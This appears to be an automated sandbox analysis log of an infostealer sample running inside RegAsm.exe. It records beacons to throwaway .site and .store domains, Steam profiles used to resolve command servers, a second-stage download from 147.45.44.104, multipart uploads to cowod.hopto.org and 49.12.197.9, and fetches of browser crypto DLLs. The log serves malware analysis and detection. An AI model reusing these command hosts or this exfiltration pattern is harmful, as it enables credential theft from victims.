                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mysterisop.site
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: absorptioniw.site
                          Source: global traffic; HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
                          Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
                          Source: global traffic; HTTP traffic detected: GET /ldms/66fe13d251bbf_lsod.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
                          Source: global traffic; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3157 Connection: Keep-Alive Cache-Control: no-cache
                          Source: unknown; TCP traffic detected without corresponding DNS query: 49.12.197.9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe; Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_00406963
                          Source: global traffic; HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic; DNS traffic detected: DNS query: steamcommunity.com
                          Source: global traffic; DNS traffic detected: DNS query: chorusarorp.site
                          Source: global traffic; DNS traffic detected: DNS query: questionsmw.store
                          Source: global traffic; DNS traffic detected: DNS query: soldiefieop.site
                          Source: global traffic; DNS traffic detected: DNS query: abnomalrkmu.site
                          Source: global traffic; DNS traffic detected: DNS query: cowod.hopto.org
                          Source: global traffic; DNS traffic detected: DNS query: treatynreit.site
                          Source: global traffic; DNS traffic detected: DNS query: snarlypagowo.site
                          Source: global traffic; DNS traffic detected: DNS query: mysterisop.site
                          Source: global traffic; DNS traffic detected: DNS query: absorptioniw.site
                          Source: global traffic; DNS traffic detected: DNS query: gravvitywio.store
                          Source: unknown; HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe$
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exe1kkkk1
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://147.45.44.104/ldms/66fe13d251bbf_lsod.exeform-data;
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.BFIIDGDGDBAE
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.DGDBAE
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.org
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.org/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.org/w
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.orgBAE
                          Source: file.exe, 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                          Source: RegAsm.exe, 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://cowod.hoptoGDGDBAE
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://ocsp.entrust.net02
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://ocsp.entrust.net03
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://www.entrust.net/rpa03
                          Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: RegAsm.exe, 00000003.00000002.2815100827.000000002032D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll#
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dllN
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dlli
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllU
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllp
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll3-w
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dlli
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll~
                          Source: RegAsm.exe, 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9FIECGD
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/1o
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/api
                          Source: CAAKFI.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: CAAKFI.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: CAAKFI.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: CAAKFI.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/
